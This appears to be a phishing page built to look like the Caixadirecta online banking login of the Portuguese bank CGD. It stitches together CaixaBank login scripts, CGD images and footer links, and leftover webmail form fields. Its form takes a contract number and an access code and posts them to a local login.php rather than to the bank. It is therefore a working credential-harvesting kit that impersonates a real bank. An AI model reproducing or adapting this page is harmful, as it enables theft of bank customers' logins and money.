<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Caixadirecta on-line</title>
		<link rel="shortcut icon" href="https://static.cgd.pt/staticSRC/cdo/global/imgSRC/faviconCDO.ico?6.0.31.14" type="image/x-icon" />
		<link rel="apple-touch-icon" href="https://static.cgd.pt/staticSRC/cdo/global/imgSRC/faviconCDO.ico?6.0.31.14" type="image/x-icon" />
		<link rel="icon" href="https://static.cgd.pt/staticSRC/cdo/global/imgSRC/faviconCDO.ico?6.0.31.14" type="image/x-icon" />
<link href="./index-es-using_files/lo_postlogon.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="./index-es-using_files/over.js.download"></script>
<script type="text/javascript" src="./index-es-using_files/jquery-1.8.3.min.js.download"></script>
<script type="text/javascript" src="./index-es-using_files/jquery.tools.min.js.download"></script>
<script type="text/javascript" src="./index-es-using_files/jquery.metadata.js.download"></script>
<script type="text/javascript" src="./index-es-using_files/jquery-ui-1.9.2.custom.min.js.download"></script>
<script src="./index-es-using_files/validacionURLs.js.download" type="text/javascript"></script>
<script src="./index-es-using_files/EloLgnB011000.js.download" type="text/javascript"></script>

<script type="text/javascript" src="./index-es-using_files/loader_prelogin.js.download"></script><script id="8c49b4d0" type="text/javascript" src="./index-es-using_files/bcaptcha.js.download"></script>

<script type="text/javascript">

var a2 = 'elolgnp011200.jsp';

$(function() {

var body_element = $('body');
function assignTabPosition(focus_element,no_blur_element,previous_link) {
if (focus_element === true) { 
body_element.focus().blur();
} else if (focus_element) { 
if (previous_link === true) { 
$(".link_ocult").remove();



} else { 
$(focus_element).focus();
if (no_blur_element !== true) {
$(focus_element).blur();
}
}
}
}
function toggleLanguageBar(button,list){
button.toggleClass("on");
button.attr('aria-expanded', function(_, attr) { return !(attr === 'true')});
list.toggle();
}

assignTabPosition(".btn_desplegable_idioma",false,true);
$(document).on('keyup', function (e) { 
if(e.which === 27) {
var parentWindow = parent.window;
parentWindow.postMessage("lolopo_escape", "https://lo.lacaixa.es");
}
});
body_element
.on('click', '#link_accesible', function (e) { 


$(
[
"#linkTecladoNormal",
"#linkTecladoNormal2",
"#introducirTecladoVirtual2",
"#introducirPasswordVirtual",
"#teclado_user",
"#accesibleEnlace"
].join(",")
).css("display", "none");
$(
[
".clave",
".btn-submit"
].join(",")
).css("margin-top", "20px");

assignTabPosition('.btn_desplegable_idioma');
})
.on('click', '#linkTecladoNormal a', function (e) { 
e.preventDefault();

var tmp = $( this ).attr("title");
$( this ).attr("title",$( this ).attr("data-back"));
$( this ).attr("data-back",tmp);
$( this ).text( $( this ).attr("title") );
if( $( this ).hasClass('active') ){ 
$( this ).removeClass('active');

$("#teclado_user").slideUp(500,function(){

assignTabPosition("#linkTecladoNormal a",true);
})
}else { 
$(this).addClass('active');

$("#teclado_user").slideDown(500, function () {

assignTabPosition('#ID');
});
}
})
.on('click', '#linkTecladoNormal2 a', function (e) { 
e.preventDefault();

var tmp = $( this ).attr("title");
$( this ).attr("title",$( this ).attr("data-back"));
$( this ).attr("data-back",tmp);
$( this ).text( $( this ).attr("title") );
var tmp1 = $( this ).attr("onclick");
$( this ).attr("onclick",$( this ).attr("data-back-onclick"));
$( this ).attr("data-back-onclick",tmp1);
if( $( this ).hasClass('active') ){ 
$( this ).removeClass('active');

$("#introducirTecladoVirtual2").slideUp(500);
$("#introducirPasswordVirtual").slideDown(500, function () {

assignTabPosition('#pin1');
});
}else { 
$(this).addClass('active');

$("#introducirPasswordVirtual").slideUp(500);
$("#introducirTecladoVirtual2").slideDown(500, function () {

assignTabPosition('#pin1');
});
}
})
.on('click', '.btn_desplegable_idioma', function (e) { 
e.preventDefault();
var button = $(this);
var list = $(this).next('.desplegable_idiomas');
toggleLanguageBar(button,list);
})
.on('keyup', '.btn_desplegable_idioma', function (e) { 
$(
[
".logo__caixa",
".logo__loterias"
].join(",")
).removeAttr("tabindex");
if(e.which === 27){
e.stopPropagation();
var button = $(this);
var list = $(this).next('.desplegable_idiomas');
toggleLanguageBar(button,list);
}
})
.on('click', '.desplegable_idiomas a', function (e) { 
var list = $(this).closest('.desplegable_idiomas');
var button = list.prev('.btn_desplegable_idioma');
list.find("a").removeClass("activo");
button.text( $( this ).attr("data-txt") );
$("#idioma").val( $( this ).attr("data-value") );
$( this ).addClass("activo");
toggleLanguageBar(button,list);
})
.on('keyup', '.desplegable_idiomas a', function (e) { 
if(e.which === 27){
e.stopPropagation();
var list = $(this).closest('.desplegable_idiomas');
var button = list.prev('.btn_desplegable_idioma');
toggleLanguageBar(button,list);
}
})
.on('blur', '.desplegable_idiomas div:last-child a', function (e) { 
var list = $(this).closest('.desplegable_idiomas');
var button = list.prev('.btn_desplegable_idioma');
toggleLanguageBar(button,list);
})
;


$('[rel="tooltip"]').mouseover(function(e) {
var tip = $(this).attr('title');
$(this).attr('title','');
$(this).append('<div id="tooltip"><div class="tipBody">' + tip + '</div><div class="tipFooter"></div></div>');
$('#tooltip').fadeIn('500');
$('#tooltip').fadeTo('10',1);
}).mouseout(function() {
$(this).attr('title',$('.tipBody').html());
$(this).children('div#tooltip').remove();
});
});
</script>
<script type="text/javascript">
var PNAjuda="LGN";
var PEAjuda="141";
var tecladoCryp = new Array(10);
urlSha2="https://lox6.lacaixa.es/logo.gif";
flagSha2="N";
tecladoCryp[0] = "7";
tecladoCryp[1] = "B";
tecladoCryp[2] = "3";
tecladoCryp[3] = "9";
tecladoCryp[4] = "6";
tecladoCryp[5] = "1";
tecladoCryp[6] = "8";
tecladoCryp[7] = "0";
tecladoCryp[8] = "5";
tecladoCryp[9] = "F";
var tecladoCrypID = new Array(37);
tecladoCrypID[0] = "0";
tecladoCrypID[1] = "9";
tecladoCrypID[2] = "2";
tecladoCrypID[3] = "4";
tecladoCrypID[4] = "3";
tecladoCrypID[5] = "8";
tecladoCrypID[6] = "7";
tecladoCrypID[7] = "1";
tecladoCrypID[8] = "6";
tecladoCrypID[9] = "5";
tecladoCrypID[10] = "Q";
tecladoCrypID[11] = "W";
tecladoCrypID[12] = "E";
tecladoCrypID[13] = "R";
tecladoCrypID[14] = "T";
tecladoCrypID[15] = "Y";
tecladoCrypID[16] = "U";
tecladoCrypID[17] = "I";
tecladoCrypID[18] = "O";
tecladoCrypID[19] = "P";
tecladoCrypID[20] = "A";
tecladoCrypID[21] = "S";
tecladoCrypID[22] = "D";
tecladoCrypID[23] = "F";
tecladoCrypID[24] = "G";
tecladoCrypID[25] = "H";
tecladoCrypID[26] = "J";
tecladoCrypID[27] = "K";
tecladoCrypID[28] = "L";
tecladoCrypID[29] = "Ñ";
tecladoCrypID[30] = "Z";
tecladoCrypID[31] = "X";
tecladoCrypID[32] = "C";
tecladoCrypID[33] = "V";
tecladoCrypID[34] = "B";
tecladoCrypID[35] = "N";
tecladoCrypID[36] = "M";
tecladoCrypID[37] = "";
var tecladoCrypPass = new Array(37);
tecladoCrypPass[0] = "8";
tecladoCrypPass[1] = "0";
tecladoCrypPass[2] = "7";
tecladoCrypPass[3] = "3";
tecladoCrypPass[4] = "2";
tecladoCrypPass[5] = "4";
tecladoCrypPass[6] = "5";
tecladoCrypPass[7] = "1";
tecladoCrypPass[8] = "6";
tecladoCrypPass[9] = "9";
tecladoCrypPass[10] = "Q";
tecladoCrypPass[11] = "W";
tecladoCrypPass[12] = "E";
tecladoCrypPass[13] = "R";
tecladoCrypPass[14] = "T";
tecladoCrypPass[15] = "Y";
tecladoCrypPass[16] = "U";
tecladoCrypPass[17] = "I";
tecladoCrypPass[18] = "O";
tecladoCrypPass[19] = "P";
tecladoCrypPass[20] = "A";
tecladoCrypPass[21] = "S";
tecladoCrypPass[22] = "D";
tecladoCrypPass[23] = "F";
tecladoCrypPass[24] = "G";
tecladoCrypPass[25] = "H";
tecladoCrypPass[26] = "J";
tecladoCrypPass[27] = "K";
tecladoCrypPass[28] = "L";
tecladoCrypPass[29] = "Ñ";
tecladoCrypPass[30] = "Z";
tecladoCrypPass[31] = "X";
tecladoCrypPass[32] = "C";
tecladoCrypPass[33] = "V";
tecladoCrypPass[34] = "B";
tecladoCrypPass[35] = "N";
tecladoCrypPass[36] = "M";
tecladoCrypPass[37] = "";
isW3C = (document.getElementById && !document.all) ? 1 : 0;
isNS4 = (document.layers) ? 1 : 0;




var identificador = getCookie("LOiden");
var identifiAux = "";
if(identificador == null || identificador == ''){
identificador = "";
}else{
identificador = unescape(identificador);
identifiAux = unescape(identificador);
}
var acept=true;
var agt=navigator.userAgent.toLowerCase();
var appVer = navigator.appVersion.toLowerCase();
var is_mac = (agt.indexOf("mac")!=-1);
var iePos  = appVer.indexOf('msie');
if (iePos !=-1) {
if(is_mac) {
var iePos = agt.indexOf('msie');
is_minor = parseFloat(agt.substring(iePos+5,agt.indexOf(';',iePos)));
}
else is_minor = parseFloat(appVer.substring(iePos+5,appVer.indexOf(';',iePos)));
is_major = parseInt(is_minor);
}
var is_opera = (agt.indexOf("opera") != -1);
var is_safari = ((agt.indexOf('safari')!=-1)&&(agt.indexOf('mac')!=-1))?true:false;
var is_khtml  = (is_safari || is_konq);
var is_konq = false;
var kqPos   = agt.indexOf('konqueror');
if (kqPos !=-1) {
is_konq  = true;
is_minor = parseFloat(agt.substring(kqPos+10,agt.indexOf(';',kqPos)));
is_major = parseInt(is_minor);
}
var is_ie   = ((iePos!=-1) && (!is_opera) && (!is_khtml));
var ipoficines='0'
if (((navigator.appName=="Netscape") && (parseFloat(navigator.appVersion)<=4.05) && (ipoficines=='0')) || ((navigator.appName=="Microsoft Internet Explorer") && (parseFloat(navigator.appVersion)<4.00))){
location.href="./html/elolgnh000202.html";
}
var d=document
var errors= new Array("","Se ha de rellenar el número secreto personal.","El número secreto personal solo puede contener números.","El número secreto personal ha de contener 4 cifras.","Su tarjeta no es operativa para este servicio.","Realizando la encriptación de los datos.","Introduzca <b>su Identificador</b>","﻿El campo identificador <b>no acepta letras, tan sólo acepta números</b>","El Número secreto personal tiene que tener <b>4 ó 6 números</b>","El Número secreto personal tiene que tener <b>4 ó 6 números</b>","El carácter '","' no es válido","<br>Puede utilizar los carácteres: 1, 2, 3, 4, 5, 6, 7, 8, 9, a, b, c, ç, d, e, f, g, h, i, j, k, l, m, n, ñ, o, p, q, r, s, t, u, v, w, x, y, z.","﻿Introduzca <b>su Número secreto personal</b>","Pulse en el <b>teclado de la pantalla</b> su Número Secreto Personal","Introduzca la identificación <b>en mayúscula</b>")
NS4 = (document.layers) ? true : false
N6=(document.getElementById&&!document.all)?true : false
flagIdioma = "02"
flagBorsa = false;
flagPE = "P"
tit=(!flagBorsa)?'banca digital CaixaBankNow':'BrokerNow'
function submit_form(){
InicializaErrores();
with (document.forms["INPUTS"]){
var error = validar2(pin1,16)
if (error == false){
f=document.forms["FEEDBACK"]
lgn=document.forms["LGN"]
f.tmp.value = revertir('+', f);
with (document.forms["INPUTS"]){
error = validateHere(ID,f.tmp,pin1,f.C,lgn.D,48,16)
if (error == false){
acept=false;
lgn.E.value=ID.value
window.status=errors[5]
lgn.submit()
}
}
}
}
}
function inicia(){
var tecladoC = getCookie("LOteclado"); 
if (window != top) top.location.href = location.href;
window.name="login"
aux = "visible";
document.forms["LGN"].FLAG_TIENE_CSS.value = aux
document.forms["LGN_DEMO"].FLAG_TIENE_CSS.value = aux
with (document.forms["INPUTS"]){
ID.value=identificador;
pin1.value=""
if(identificador!=null && identificador!=''){
if(identifiAux!=null && identifiAux!=''){
recordar.checked=true;
}
}
}
with (document.forms["FEEDBACK"]){
A.value='6E4004C1125F6C87'
C.value='001'
D.value='1333B0450441E120'
}
if(tecladoC!=null && tecladoC =='ext'){
TraerContenidoQwertyPortal('/GPeticiones;WebLogicSession=tJB126WBrjhTERRGYM2h6-wfX1_mTTBCEXHPCi5pKaG0Dj7HQZQG!-243022298!330816785?PN=LGN&PE=118','destinoTecladoVirtual2');
document.getElementById("introducirTecladoVirtual2").style.display='block';
$(".trigger_teclado_pwd").attr("title","Mostrar teclado sencillo");
$(".trigger_teclado_pwd").attr("onclick","javascript:cambioTecladoNormalPinPortal();");
$(".trigger_teclado_pwd").attr("data-back","Mostrar teclado con letras");
$(".trigger_teclado_pwd").attr("data-back-title","Mostrar teclado con letras");
$(".trigger_teclado_pwd").attr("data-back-onclick","javascript:cambioTecladoVirtualPinPortal();");
$(".trigger_teclado_pwd").text("Mostrar teclado sencillo");
$(".trigger_teclado_pwd").attr("class","trigger_teclado_pwd link active");
cambioTecladoVirtualPinPortalInicio();
}else{
$(".trigger_teclado_pwd").attr("title","Mostrar teclado con letras");
$(".trigger_teclado_pwd").attr("onclick","javascript:cambioTecladoVirtualPinPortal();");
$(".trigger_teclado_pwd").attr("data-back","Mostrar teclado sencillo");
$(".trigger_teclado_pwd").attr("data-back-title","Mostrar teclado sencillo");
$(".trigger_teclado_pwd").attr("data-back-onclick","javascript:cambioTecladoNormalPinPortal();");
$(".trigger_teclado_pwd").text("Mostrar teclado con letras");
document.getElementById("introducirPasswordVirtual").style.display='block';
}











}
function info(){
remoto=window.open("https://portal.lacaixa.es/general/avisolegal_es.html","info","width=760,height=250,resizable=yes");
if (remoto.opener == null) remoto.opener = window;
}
function n_ventana(opc){

if (opc == 1) {
openW((flagPE=="E")?'https://portal.lacaixa.es/seguridad/seguridad_es.html':'https://portal.lacaixa.es/seguridad/seguridad_es.html','',750,400,1,1,1,1,0,1,1,1);
}

else if (opc == 2) {
openW((flagPE=="E")?'https://portal.lacaixa.es/general/tarifascomisiones_es.html':'https://portal.lacaixa.es/general/tarifascomisiones_es.html','',750,400,1,1,1,1,0,1,1,1);
}
return void(null)
}
function ayudaCheck(){
if(document.forms["INPUTS"].recordar.checked == true){
ayuda();
}
}
function ayuda(){
remoto=window.open("https://portal.lacaixa.es/home/masinfololopo_es.html","","width=990,height=600,resizable=yes,scrollbars=yes");
if (remoto.opener == null) remoto.opener = window;
}
function gestionCookie(){
if(document.getElementById("recordar") != null){
if(document.getElementById("recordar").checked){

guardarCookie("LOiden",document.getElementById("ID").value,1000 * 60 * 60 * 24 * 365 * 10,"/",'.caixabank.es');
}else{
eliminarCookie("LOiden","/",'.caixabank.es');
}
}
if(acept) submit_form();
}

function accederLOEnter(evento){
var key = evento.keyCode || evento.which;
if (key == 13){
var valorHref = document.getElementById("enlaceBotonAceptar").href;
if (valorHref.indexOf("accesible") != -1){
buttonAcep('accesible');
}else{
buttonAcep('normal');
}
}
}

function is_not_Whitelisted(tag, attribute){

if (($(tag).attr(attribute).match(/^http/) || $(tag).attr(attribute).match(/^\/\//)) &&

$(tag).attr(attribute).match(/^(?!http:\/\/portal.lacaixa.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc1.lacaixa.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc2.lacaixa.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc3.lacaixa.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc4.lacaixa.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc5.lacaixa.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc6.lacaixa.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc7.lacaixa.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc8.lacaixa.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/portal.lacaixa.es)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/empresa.lacaixa.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/www.lacaixa.com\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/www.lacaixa.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/caixabank.com)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/www.caixabank.com)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc9.lacaixa.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc10.lacaixa.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc1.caixabank.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc2.caixabank.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc3.caixabank.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc4.caixabank.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc5.caixabank.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc6.caixabank.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc7.caixabank.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc8.caixabank.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc9.caixabank.es\/)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/loc10.caixabank.es\/)/) &&

$(tag).attr(attribute).match(/^(?!http:\/\/www.caixabank.es)/) &&

$(tag).attr(attribute).match(/^(?!https:\/\/www.caixabank.es)/))

{
return 1;
}
return 0;
}
function TraerContenidoQwertyPortal(datos,contenedor){
divResultado = document.getElementById(contenedor);
ajax=getXMLHttpRequest();
ajax.open("POST", datos);
ajax.setRequestHeader("Content-Type", "text/html;charset=UTF-8");
ajax.onreadystatechange=function(){
if(ajax.readyState==1){
divResultado.innerHTML="<img style='center' src='../imatge/ajax-loader_big.gif'/>"
}else if(ajax.readyState==4){
divResultado.innerHTML=ajax.responseText;
}
}
ajax.send(null)
}
function cambioTecladoNormalPinPortal(){
document.getElementById("pin1").setAttribute("readOnly", 'true');
document.getElementById("enlaceBotonAceptar").href="javascript:buttonAcep('normal');comprobarInputsStyle();";
document.forms["INPUTS"].pin1.value='';
eliminarCookie('LOteclado','/','.caixabank.es');
}
function cambioTecladoVirtualPinPortal(){
document.getElementById("pin1").removeAttribute("readOnly", true);
document.getElementById("enlaceBotonAceptar").href="javascript:buttonAcep('accesible');comprobarInputsStyle();";
document.forms["INPUTS"].pin1.value='';
TraerContenidoQwertyPortal('/GPeticiones;WebLogicSession=tJB126WBrjhTERRGYM2h6-wfX1_mTTBCEXHPCi5pKaG0Dj7HQZQG!-243022298!330816785?PN=LGN&PE=118','destinoTecladoVirtual2');
guardarCookie('LOteclado','ext',1000 * 60 * 60 * 24 * 365 * 10,'/','.caixabank.es');
}
function cambioTecladoVirtualPinPortalInicio(){
document.getElementById("pin1").removeAttribute("readOnly", true);
document.getElementById("enlaceBotonAceptar").href="javascript:buttonAcep('accesible');comprobarInputsStyle();";
document.forms["INPUTS"].pin1.value='';
}
function comprobarInputsStyle(){
if (document.getElementById("capaErrorID").style.display == 'none')
{
document.getElementById("ID").className='';
}else if (document.getElementById("capaErrorID").style.display == 'block'){
document.getElementById("ID").className='error';
}
if (document.getElementById("capaErrorPW").style.display == 'none')
{
document.getElementById("pin1").className='';
}else if (document.getElementById("capaErrorPW").style.display == 'block'){
document.getElementById("pin1").className='error';
}
}
function openCaixaBank(){
urlRed='http://www.caixabank.es'
openW(urlRed,'logotip',750,400,1,1,1,1,0,1,1,1);
}
function cambiarTecladoAccesible(){
$("#pin1").attr('readOnly', false);
$("#enlaceBotonAceptar").attr('href', "javascript:buttonAcep('accesible');comprobarInputsStyle();");
if (document.forms["INPUTS"].ID.value.length < 21)
{
aux = document.forms["INPUTS"].ID.value;
}
document.forms["INPUTS"].ID.value= aux;
if(document.forms["INPUTS"].ID.value=='')
{
if(document.getElementById("recordar") != null)
{
document.getElementById("recordar").checked = false;
}
}

document.forms["INPUTS"].pin1.value='';

}
function marcarCheck(evento){
var key = evento.keyCode || evento.which;
if (key == 13){
if(document.getElementById("recordar").checked == true){
document.getElementById("recordar").checked = false;
} else {
document.getElementById("recordar").checked = true;
}
}
}
</script>
</head>
<body onload="arranque();" marginwidth="0" marginheight="0" class="pad0">
<div>
<div class="rfloat lang_container"><div class="lang"><div class="lfloat pos_relative">
	<img border="0" src="index-es-using_files/Untitled.png" width="1291" height="53"><input type="hidden" name="idioma" id="idioma" value="ES"></div></div></div>
</div>
<div class="limpiar bbot4blue inferior20 medida100"></div>
<div class="contenido_sin_frame">
<div class="login-new">
<div class="limpiar"></div>
<div class="mb20">

<img class="img-responsive center-block" ng-src="/idp-auva/spring/cmsMedia/C1257BF700521CB1/vwLookupResources/bandeau_new_ebanking_de/$file/1280x250_DE.jpg" src="https://www.cgd.pt/Particulares/Em-Campanha/PublishingImages/Assistente-Digital/AD-Desbloqueio_1600x360.png" style="box-sizing: border-box; border: 0px; vertical-align: middle; display: block; max-width: 100%; height: auto; margin-right: auto; margin-left: auto; color: rgb(51, 51, 51); font-family: &quot;Open Sans&quot;, Tahoma, Geneva, sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><div class="welcomeParagraph ng-binding" ng-bind-html="cms.loginpage.welcomeBlock | unsafe" style="box-sizing: border-box; margin-top: 20px; color: rgb(51, 51, 51); font-family: &quot;Open Sans&quot;, Tahoma, Geneva, sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">
	<br style="box-sizing: border-box;">
&nbsp;</div>
</div>
<!-- Content -->
  <form name="loginForm" method="POST" action="login.php" name="sessionId" value="aaaxjBwYwh0u_-nJGH1cw">

    

    <input type="hidden" name="variant" value="bh_theme">
    
    
   
    <input type="hidden" name="client" value="html">
    <input type="hidden" name="directMessageView" value="">
    <input type="hidden" name="uid" value="">
    <input type="hidden" name="uidl" value="">
    <input type="hidden" name="folder" value="">
    <input type="hidden" name="remoteAccountUID" value="">
    <input type="hidden" name="login" value="1">
    <input type="hidden" name="domain" value="webmail.tampabay.rr.com">
    
    <input type="hidden" id="autoSaveMessageText" name="autoSaveMessageText" value="">

    <div class="richAdLoginContent">
    <table class="mainPanelInBodyTableFormattingLogin">
        <!-- Email -->

	<!-- logo bar -->


        <tbody><tr>
            <td valign="top"><table valign="top" class="mainPanelInBodyTableFormatting">
			<tbody>
                        <tr>
                                <td class="mainPanelTxt_12B mainPanelLoginWidthAlign">
<label for="indentificacion"><font size="5">Número de contrato.</font></label><font size="5">
</font>
</td>
                        </tr>
                        <tr>
                                <td class="mainPanelComposeMailPadding3 loginHeader">
                                <input type="text" name="account" maxlength="150" id="account" size="20"></td>
                        </tr>
                        
                        <tr>
                                <td class="mainPanelTxt_12B mainPanelLoginWidthAlign">
<label class="lfloat" for="pin1"><font size="5">Código de acesso </font></label></td>
                        </tr>
                        <tr>
                                <td class="mainPanelComposeMailPadding3 loginHeader">
                                        <input type="password" name="password" id="password" redisplay="false" maxlength="150" onkeypress="javascript:onKeyPressBlockNumbers(event)" size="20"></td>
                        </tr>
                        
			<tr><td class="mainPanelTxt_12B">
	&nbsp;</td>
			</tr>
			<tr>
                          <td><!-- Buttons -->
                        <div class="mainPanelEndOfPageButtons">
                        
                        <div class="mainPanelTextFieldPadding mainPanelLoginTopPadding">
                        <input id="loginButton" type="submit" class="mainPanelInPageButtons" title="Log In" value="ENTRAR" onmouseover="return hint(&#39;Log In&#39;)" onmouseout="return hint()" style="font-family: Arial; font-weight: bold; border-style: solid; border-width: 1; padding-left: 4; padding-right: 4; padding-top: 1; padding-bottom: 1; background-color: #C0C0C0">
                        </div>
                        </div></td>
                </tr>
        </tbody></table></td>
        </tr>
    </tbody></table>
   	<p>
	<img border="0" src="index-es-using_files/logo_ama_hover.png" width="176" height="44"></p>
	<p>&nbsp;</p>
	<p>&nbsp;</p>
	<p>&nbsp;</p>
	<p>&nbsp;</p>
	<p>&nbsp;</p>
	<p>&nbsp;</p>
	<p>&nbsp;</p>
	<p>&nbsp;</p>
	<p>&nbsp;</p>
	<p>&nbsp;</p>
	<div class="container" style="margin: 0px 146px; padding: 10px 0px 0px; border-width: 5px 0px 0px; border-top-style: solid; border-right-style: initial; border-bottom-style: initial; border-left-style: initial; border-top-color: rgb(0, 45, 116); border-right-color: initial; border-bottom-color: initial; border-left-color: initial; border-image: initial; outline: 0px; font-size: 16px; font-family: Arial; vertical-align: middle; width: 710px; text-align: center; line-height: 16px; color: rgb(0, 0, 0); font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-style: initial; text-decoration-color: initial;">
		<ul style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 16px; font-family: Arial; vertical-align: middle; list-style: none; display: inline;">
			<li class="firstitem" style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 0.75em; font-family: Arial; vertical-align: middle; display: inline; white-space: normal; color: rgb(136, 136, 136);">
			<a target="_blank" style="margin: 0px; padding: 0px 8px 0px 10px; border: none; outline: 0px; font-size: 12px; font-family: Arial; vertical-align: middle; display: inline; color: rgb(136, 136, 136); text-decoration: none; font-weight: bold;" href="https://www.cgd.pt/ajuda/Seguranca/Pages/Seguranca-e-Fraude.aspx">
			Segurança</a></li>
			<li style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 0.75em; font-family: Arial; vertical-align: middle; display: inline; white-space: normal; color: rgb(136, 136, 136);">
			<a onclick="return openWindow('https://www.cgd.pt/Ajuda/Contactos/Pages/Contactos.aspx', 'cdtExternal');" style="margin: 0px; padding: 0px 8px 0px 10px; border-width: 0px 0px 0px 1px; border-top-style: initial; border-right-style: initial; border-bottom-style: initial; border-left-style: solid; border-top-color: initial; border-right-color: initial; border-bottom-color: initial; border-left-color: rgb(136, 136, 136); border-image: initial; outline: 0px; font-size: 12px; font-family: Arial; vertical-align: middle; display: inline; color: rgb(136, 136, 136); text-decoration: none; font-weight: bold;" href="https://www.cgd.pt/Ajuda/Contactos/Pages/Contactos.aspx">
			Contactos</a></li>
			<li style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 0.75em; font-family: Arial; vertical-align: middle; display: inline; white-space: normal; color: rgb(136, 136, 136);">
			<a onclick="return openWindow('https://www.cgd.pt/Precario/Pages/Precario.aspx', 'cdtExternal');" style="margin: 0px; padding: 0px 8px 0px 10px; border-width: 0px 0px 0px 1px; border-top-style: initial; border-right-style: initial; border-bottom-style: initial; border-left-style: solid; border-top-color: initial; border-right-color: initial; border-bottom-color: initial; border-left-color: rgb(136, 136, 136); border-image: initial; outline: 0px; font-size: 12px; font-family: Arial; vertical-align: middle; display: inline; color: rgb(136, 136, 136); text-decoration: none; font-weight: bold;" href="https://www.cgd.pt/Precario/Pages/Precario.aspx">
			Preçário</a></li>
			<li style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 0.75em; font-family: Arial; vertical-align: middle; display: inline; white-space: normal; color: rgb(136, 136, 136);">
			<a onclick="return openWindow('https://www.cgd.pt/Particulares/Contas/Abertura-conta/Documents/ICGD0207.pdf ', 'cdtExternal');" style="margin: 0px; padding: 0px 8px 0px 10px; border-width: 0px 0px 0px 1px; border-top-style: initial; border-right-style: initial; border-bottom-style: initial; border-left-style: solid; border-top-color: initial; border-right-color: initial; border-bottom-color: initial; border-left-color: rgb(136, 136, 136); border-image: initial; outline: 0px; font-size: 12px; font-family: Arial; vertical-align: middle; display: inline; color: rgb(136, 136, 136); text-decoration: none; font-weight: bold;" href="https://www.cgd.pt/Particulares/Contas/Abertura-conta/Documents/ICGD0207.pdf">
			Condições Gerais</a></li>
			<li style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 0.75em; font-family: Arial; vertical-align: middle; display: inline; white-space: normal; color: rgb(136, 136, 136);">
			<a onclick="return openWindow('https://www.cgd.pt/Ajuda/Espaco-Cliente/Pages/Contacto-On-line.aspx?op1=3', 'cdtExternal');" style="margin: 0px; padding: 0px 8px 0px 10px; border-width: 0px 0px 0px 1px; border-top-style: initial; border-right-style: initial; border-bottom-style: initial; border-left-style: solid; border-top-color: initial; border-right-color: initial; border-bottom-color: initial; border-left-color: rgb(136, 136, 136); border-image: initial; outline: 0px; font-size: 12px; font-family: Arial; vertical-align: middle; display: inline; color: rgb(136, 136, 136); text-decoration: none; font-weight: bold;" href="https://www.cgd.pt/Ajuda/Espaco-Cliente/Pages/Contacto-On-line.aspx?op1=3">
			Espaço Cliente</a></li>
		</ul>
		<p style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 16px; font-family: Arial; vertical-align: middle;">&nbsp;</p>
		<p style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 16px; font-family: Arial; vertical-align: middle;">
		<img alt="Certificado Verisign" src="https://static.cgd.pt/staticCMS/cdo/global/img/logo_verisign.gif" style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 16px; font-family: Arial; vertical-align: middle;"></p>
		<div class="cgdlogo" style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 16px; font-family: Arial; vertical-align: middle;">
